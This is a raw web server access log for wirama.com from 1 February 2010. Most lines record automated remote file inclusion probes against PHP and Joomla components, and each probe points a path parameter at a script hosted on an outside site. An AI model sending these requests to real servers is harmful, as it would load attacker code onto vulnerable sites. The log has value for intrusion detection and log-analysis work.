219.240.36.36 - - [01/Feb/2010:00:00:17 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:00:00:17 -0800] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:00:00:17 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:00:00:17 -0800] "GET /logs/access_091101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
115.68.3.94 - - [01/Feb/2010:00:02:37 -0800] "GET /logs/access_090329.log%20%20///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:02:38 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:02:38 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:00:03:37 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:00:03:37 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:00:03:37 -0800] "GET /logs/access_090731.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:00:03:37 -0800] "GET /logs/access_090731.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:00:03:37 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:00:03:37 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
115.68.3.94 - - [01/Feb/2010:00:05:30 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:05:30 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:05:30 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:05:54 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:05:54 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:05:54 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:05:56 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:05:56 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:05:56 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.40.203.226 - - [01/Feb/2010:00:06:09 -0800] "GET /logs/access_100101.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:06:10 -0800] "GET /logs/access_090701.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:06:10 -0800] "GET /logs/access_090701.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.195.112.29 - - [01/Feb/2010:00:06:56 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:06:58 -0800] "GET /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:06:58 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:06:58 -0800] "GET /logs/access_100101.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.195.112.29 - - [01/Feb/2010:00:07:00 -0800] "GET /logs/access_090401.log HTTP/1.0" 200 74403 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:07:03 -0800] "GET /logs/access_091201.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:05 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:05 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:06 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:06 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:06 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:06 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:09 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:09 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:09 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:11 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:11 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:11 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:16 -0800] "GET /logs/access_090731.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:16 -0800] "GET /logs/access_090731.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:00:08:17 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:00:08:17 -0800] "GET /logs/access_090801.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:00:08:17 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:19 -0800] "GET /logs/access_090701.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:19 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:19 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:19 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:20 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:20 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:20 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:20 -0800] "GET /logs/access_090701.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:21 -0800] "GET /logs/access_090731.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:23 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:23 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:23 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:25 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:25 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:25 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:28 -0800] "GET /logs/access_090701.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:08:44 -0800] "GET /logs/access_090731.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Feb/2010:00:12:33 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Feb/2010:00:12:33 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Feb/2010:00:12:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:12:51 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:12:51 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:12:51 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:12:55 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:12:55 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:12:55 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Feb/2010:00:13:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Feb/2010:00:13:00 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Feb/2010:00:13:00 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:13:05 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:13:11 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.199.242.22 - - [01/Feb/2010:00:13:50 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.199.242.22 - - [01/Feb/2010:00:13:50 -0800] "GET /logs/access_090701.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.199.242.22 - - [01/Feb/2010:00:13:50 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.199.242.22 - - [01/Feb/2010:00:13:57 -0800] "GET /logs/access_091101.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.199.242.22 - - [01/Feb/2010:00:17:31 -0800] "GET /logs/access_090601.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:17:53 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:17:53 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:17:53 -0800] "GET /logs/access_091101.log//bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
115.68.3.94 - - [01/Feb/2010:00:21:54 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:21:54 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:21:54 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:05 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:05 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:06 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:13 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.93.36.90 - - [01/Feb/2010:00:22:15 -0800] "GET /logs/access_090330.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.93.36.90 - - [01/Feb/2010:00:22:15 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
219.93.36.90 - - [01/Feb/2010:00:22:15 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3946 "-" "Mozilla/5.0" "wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:15 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:15 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:34 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:34 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:22:35 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:23:13 -0800] "GET /logs/access_090731.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:23:27 -0800] "GET /logs/access_090731.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:23:31 -0800] "GET /logs/access_090731.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:24:02 -0800] "GET /logs/access_090731.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:07 -0800] "GET /logs/access_090329.log%20%20///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:07 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:07 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:08 -0800] "GET /logs/access_090329.log%20%20///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:08 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:08 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:13 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:13 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:13 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:14 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:14 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:24:14 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
